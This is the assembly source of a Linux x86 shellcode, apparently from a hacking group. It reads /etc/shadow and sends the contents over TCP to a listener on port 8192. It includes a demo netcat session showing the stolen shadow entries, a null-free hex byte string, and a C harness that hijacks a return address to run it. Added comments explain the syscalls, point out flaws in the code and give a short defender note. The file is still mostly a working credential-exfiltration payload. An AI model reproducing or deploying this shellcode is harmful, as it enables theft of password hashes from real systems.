; (C)oDed by 0in
; Dark-Coders Group Productions
; [Linux x86 connect back&send&exit /etc/shadow 155 byte shellcode]
; >>>>>>>>>>>>>>>>>>>> www.dark-coders.pl <<<<<<<<<<<<<<<<<<<<<<
; Contact: 0in[dot]email[at]gmail[dot]com
; Greetings to:die_Angel,suN8Hclf,m4r1usz,cOndemned
; Compile:
; nasm -f elf shellcode.asm
; ld -o shellcode shellcode.o
; How it works!?
; (1st console) [root@13world]# ./shellcode
; (2nd console) 0in[~]%> nc -v -l -p 8192
; (2nd console)
;Connection from 127.0.0.1:48820
;root:[password here]:13896::::::
;bin:x:0::::::
;daemon:x:0::::::
;mail:x:0::::::
;ftp:x:0::::::
;nobody:x:0::::::
;dbus:!:13716:0:99999:7:::
;zer0in:[password here]:13716:0:99999:7:::
;avahi:!:13716:0:99999:7:::
;hal:!:13716:0:99999:7:::
;clamav:!:13735:0:99999:7:::
;fetchmail:!:13737:0:99999:7:::
;mysql:!:12072:0:99999:7:::
;postfix:!:13798:0:99999:7:::
;mpd:!:13828:0:99999:7:::
;nginx:!:13959:0:99999:7:::
;tomcat:!:14063:0:99999:7:::
;http:!:14075:0:99999:7:::
;snort:!:14075:0:99999:7:::
;The code (Assembler version):
Section .text
global _start
;-----------------------------------------------------------------------
; _start   (NASM, Linux x86 32-bit, raw int 0x80 syscalls, null-free)
; Sequence as written: open("/etc/shadow") -> read(fd, stack, 1222)
;   -> socket(AF_INET, SOCK_STREAM, 0) -> connect(sock, 0.0.0.0:8192)
;   -> write(sock, stack, 1222) -> exit(1)
; Constants and syscall numbers are built with 16-bit mov/sub pairs or
; inc chains so that no 0x00 byte appears in the encoding; the comments
; below give the value each pair evaluates to.
; Entry-state reliance: only the low 16 bits of eax are cleared before
; the first two int 0x80, and ecx (open flags) is never set, so the
; code depends on eax/ecx being zero at entry -- presumably the case at
; ELF process entry on Linux, not guaranteed from the C harness below.
; No return value is checked; a failed open/socket/connect is silently
; carried into the next call.
; Defender notes: reading /etc/shadow needs root; the observable
; pattern is open("/etc/shadow") followed in the same process by
; socket/connect to TCP port 8192 and a write of the file contents.
;-----------------------------------------------------------------------
_start:
;open("/etc/shadow", flags): eax = 5 (sys_open), ebx = path, ecx = flags (left untouched here)
xor ebx,ebx
push byte 0x77 ; "w" pushed as a sign-extended dword -> also supplies the terminating NUL
push word 0x6f64 ; "do"
push 0x6168732f ; "/sha"
push 0x6374652f; "/etc" -> esp now points at "/etc/shadow\0"
mov ebx,esp ; first arg - filename
xor ax,ax
inc ax
inc ax
inc ax
inc ax
inc ax ; ax = 5 = sys_open (O_RDONLY would be the ecx argument, which is not written)
int 0x80
mov ebx,eax ; ebx = fd returned by open (no error check)
;read(fd, buf, 1222): eax = 3 (sys_read)
xor ax,ax
inc ax
inc ax
inc ax ; ax = 3 = sys_read
mov dx,1222 ; byte count (only the low 16 bits of edx are set)
push esp
mov ecx,[esp] ; ecx = esp before the push = address of the "/etc" dword; the file is read over the path string and the stack above it
int 0x80
mov esi,eax ; esi = number of bytes read (a count, not a pointer)
;socket(PF_INET,SOCK_STREAM,IPPROTO_IP) via socketcall(SYS_SOCKET, &args)
xor ebx,ebx
push ebx ;0 ; 3rd arg: protocol
inc ebx
push ebx ;1 ; 2nd arg: SOCK_STREAM
inc ebx
push ebx ;2 ; 1st arg: AF_INET
;socketcall()
mov ax,1666 ; ax = 1666 - 1564 = 102 = sys_socketcall
sub ax,1564 ; (split into two immediates to avoid a 0x00 byte)
xor bx,bx
inc bx ; bx = 1 = SYS_SOCKET
mov ecx,esp ; ecx = &args[3] pushed above
int 0x80 ; eax = socket fd (no error check)
pop ebx; drops the AF_INET dword; ebx = 2
;connect(sock, &sockaddr_in, 16) via socketcall(SYS_CONNECT, &args)
;16 - sizeof struct sockaddr_in
mov edx, eax ; edx = socket fd
xor ebx,ebx
xor ebx,ebx ; ebx = 0 -> sin_addr = 0.0.0.0 (author's placeholder for the peer IP). Only one of these two xors appears in the hex dump below.
push ebx ; sin_addr
mov bx,1666 ; bx = 1666 - 1634 = 32 = 0x0020; stored little-endian it reads as 0x2000 in network order = port 8192
sub bx,1634
push bx ; sin_port
mov al, 2 ; al = AF_INET; ah is not cleared and still holds the second byte of the fd
push ax ; sin_family
mov ecx, esp ; ecx = &sockaddr_in
mov al, 16
push eax ; addrlen = 16 (upper bytes of eax are the fd's and are assumed zero)
push ecx ; &sockaddr_in
push edx ; socket fd
mov al, 102 ; al = sys_socketcall (upper bytes of eax again assumed zero)
mov bx,1666
sub bx,1663 ; bx = 1666 - 1663 = 3 = SYS_CONNECT
mov ecx, esp ; ecx = &args[3]
int 0x80 ; call connect
mov ebx,eax ; ebx = connect() return value (0 on success); overwritten by the pop below, so never used
; Ok! so...
;write(sock, buf, 1222): eax = 4 (sys_write), ebx = sock, ecx = buf, edx = count
pop ebx ; ebx = socket fd (the dword pushed from edx above)
mov ax,1666 ; ax = 1666 - 1662 = 4 = sys_write
sub ax,1662
push esi ; stores the read() byte count in the slot just freed; ecx still points at that slot
mov dx,16666 ; dx = 16666 - 15444 = 1222 bytes
sub dx,15444
int 0x80 ; ecx is the stack address of the connect() argument array (by my count 32 bytes below the read buffer), so the 1222 bytes sent begin with those argument/sockaddr bytes and then run into the file data read earlier
;exit(1) :
xor eax,eax
inc eax ; eax = 1 = sys_exit
mov ebx,eax ; exit status = 1
int 0x80 ; do it!
;C:
; #include <stdio.h>
; char shellcode[]="\x31\xdb"
; "\x6a\x77"
; "\x66\x68\x64\x6f"
; "\x68\x2f\x73\x68\x61"
; "\x68\x2f\x65\x74\x63"
; "\x89\xe3"
; "\x66\x31\xc0"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\xcd\x80"
; "\x89\xc3"
; "\x66\x31\xc0"
; "\x66\x40"
; "\x66\x40"
; "\x66\x40"
; "\x66\xba\xc6\x04"
; "\x54"
; "\x8b\x0c\x24"
; "\xcd\x80"
; "\x89\xc6"
; "\x31\xdb"
; "\x53"
; "\x43"
; "\x53"
; "\x43"
; "\x53"
; "\x66\xb8\x82\x06"
; "\x66\x2d\x1c\x06"
; "\x66\x31\xdb"
; "\x66\x43"
; "\x89\xe1"
; "\xcd\x80"
; "\x5b"
; "\x89\xc2"
; "\x31\xdb"
; "\x53"
; "\x66\xbb\x82\x06"
; "\x66\x81\xeb\x62\x06"
; "\x66\x53"
; "\xb0\x02"
; "\x66\x50"
; "\x89\xe1"
; "\xb0\x10"
; "\x50"
; "\x51"
; "\x52"
; "\xb0\x66"
; "\x66\xbb\x82\x06"
; "\x66\x81\xeb\x7f\x06"
; "\x89\xe1"
; "\xcd\x80"
; "\x89\xc3"
; "\x5b"
; "\x66\xb8\x82\x06"
; "\x66\x2d\x7e\x06"
; "\x56"
; "\x66\xba\x1a\x41"
; "\x66\x81\xea\x54\x3c"
; "\xcd\x80"
; "\x31\xc0"
; "\x40"
; "\x89\xc3"
; "\xcd\x80";
; int main(int argc, char **argv)
; {
; int *ret;
; ret = (int *)&ret + 2;
; (*ret) = (int) shellcode;
; }